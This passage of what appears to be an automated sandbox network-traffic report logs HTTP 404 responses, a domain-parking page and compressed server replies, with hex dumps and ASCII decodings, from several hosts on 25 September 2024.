dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:56:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:56:36 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:56:39 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:56:42 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:56:45 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 07:57:05 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 07:57:08 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 07:57:11 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 07:57:14 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: 894_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0content-length: 11547content-encoding: brvary: Accept-Encodingdate: Wed, 25 Sep 2024 07:57:47 GMTserver: LiteSpeedData Raw: e2 af 3b 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 b1 4f 76 84 f6 b0 a2 3b 25 f5 33 38 54 d5 ac d1 9e 9e 85 fd 5a 42 7d 9c ed cb c1 0a 07 12 a1 c2 17 41 78 3d d2 5a 04 69 74 c6 73 07 f2 d2 b0 73 b7 6d c1 6f 88 cd c0 8d 65 b0 7f ef 59 8b d8 64 84 ae a3 ec 67 d3 75 a8 83 27 50 0a a2 46 69 ca ef 14 a1 c7 2e 3a 3f fd db f8 34 58 ec cc 57 f9 1e 43 90 fa e0 a1 82 91 ec 85 c7 8f 4e 91 32 92 e3 3e 64 0f 99 67 03 33 ee f0 b0 2a 4d b7 87 ac 36 0e 1f 32 04 2f e3 43 96 2f 19 67 f3 87 6c 5d 9c d7 c5 43 46 52 82 e7 40 4a 72 fa 8b e7 43 4a fc e9 80 33 eb 4f 87 8f 36 7f 3a fc fa fd 2e 7f ba 24 d3 bb 1a 49 39 92 da e8 5a 84 a0 82 66 88 c2 22 97 67 3e 64 83 a5 15 40 ee 21 fb ea 67 42 bc 77 9c 3a 54 28 3c b2 4e 6a f6 d5 7f 7f 42 57 ad d8 8a 15 e4 7a dd 46 d9 cb 9b 7d 36 9c 5c 2b 15 82 f4 20 fa 60 e8 be 01 e6 c6 06 5e 66 d1 cd ca 3f 97 1b cb 54 27 e3 49 38 30 a9 4f 71 bb ac 3b d4 31 26 63 70 97 e5 ad a1 1a f7 6b b8 d0 07 f4 c1 97 98 b6 22 e9 b2 ae 6e 4c d8 61 f0 fe 14 5e b7 71 72 dd 7a f4 5e 1a fd 3e 18 27 0e c8 3c 86 3f 03 76 b1 49 ff 7a ff fa 3f cc 07 27 f5 41 b6 97 38 24 c9 b5 52 6e 1d af 57 12 7e 5e 1b 63 1a 52 9d 8c c8 f6 4e 7d 2d de 61 1d 62 9e f2 14 59 2d f4 49 78 56 5f a8 59 72 d7 96 d7 2a 49 91 b5 52 a9 0f 78 0e 71 48 79 ca 93 6d 22 de a0 35 0e f0 51 ea 30 2f 7e 74 4e 5c 62 64 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 Data Ascii: ;QG0R|"!|1tkdj'c?[z/WIZc
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: 894_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 25 Sep 2024 07:57:49 GMTserver: LiteSpeedData Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 b1 4f 76 84 f6 b0 a2 3b 25 f5 33 38 54 d5 ac d1 9e 9e 85 fd 5a 42 7d 9c ed cb c1 0a 07 12 a1 c2 17 41 78 3d d2 5a 04 69 74 c6 73 07 f2 d2 b0 73 b7 6d c1 6f 88 cd c0 8d 65 b0 7f ef 59 8b d8 64 84 ae a3 ec 67 d3 75 a8 83 27 50 0a a2 46 69 ca ef 14 a1 c7 2e 3a 3f fd db f8 34 58 ec cc 57 f9 1e 43 90 fa e0 a1 82 91 ec 85 c7 8f 4e 91 32 92 e3 3e 64 0f 99 67 03 33 ee f0 b0 2a 4d b7 87 ac 36 0e 1f 32 04 2f e3 43 96 2f 19 67 f3 87 6c 5d 9c d7 c5 43 46 52 82 e7 40 4a 72 fa 8b e7 43 4a fc e9 80 33 eb 4f 87 8f 36 7f 3a fc fa fd 2e 7f ba 24 d3 bb 1a 49 39 92 da e8 5a 84 a0 82 66 88 c2 22 97 67 3e 64 83 a5 15 40 ee 21 fb ea 67 42 bc 77 9c 3a 54 28 3c b2 4e 6a f6 d5 7f 7f 42 57 ad d8 8a 15 e4 7a dd 46 d9 cb 9b 7d 36 9c 5c 2b 15 82 f4 20 fa 60 e8 be 01 e6 c6 06 5e 66 d1 cd ca 3f 97 1b cb 54 27 e3 49 38 30 a9 4f 71 bb ac 3b d4 31 26 63 70 97 e5 ad a1 1a f7 6b b8 d0 07 f4 c1 97 98 b6 22 e9 b2 ae 6e 4c d8 61 f0 fe 14 5e b7 71 72 dd 7a f4 5e 1a fd 3e 18 27 0e c8 3c 86 3f 03 76 b1 49 ff 7a ff fa 3f cc 07 27 f5 41 b6 97 38 24 c9 b5 52 6e 1d af 57 12 7e 5e 1b 63 1a 52 9d 8c c8 f6 4e 7d 2d de 61 1d 62 9e f2 14 59 2d f4 49 78 56 5f a8 59 72 d7 96 d7 2a 49 91 b5 52 a9 0f 78 0e 71 48 79 ca 93 6d 22 de a0 35 0e f0 51 ea 30 2f 7e 74 4e 5c 62 64 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcP
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: 894_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 25 Sep 2024 07:57:52 GMTserver: LiteSpeedData Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 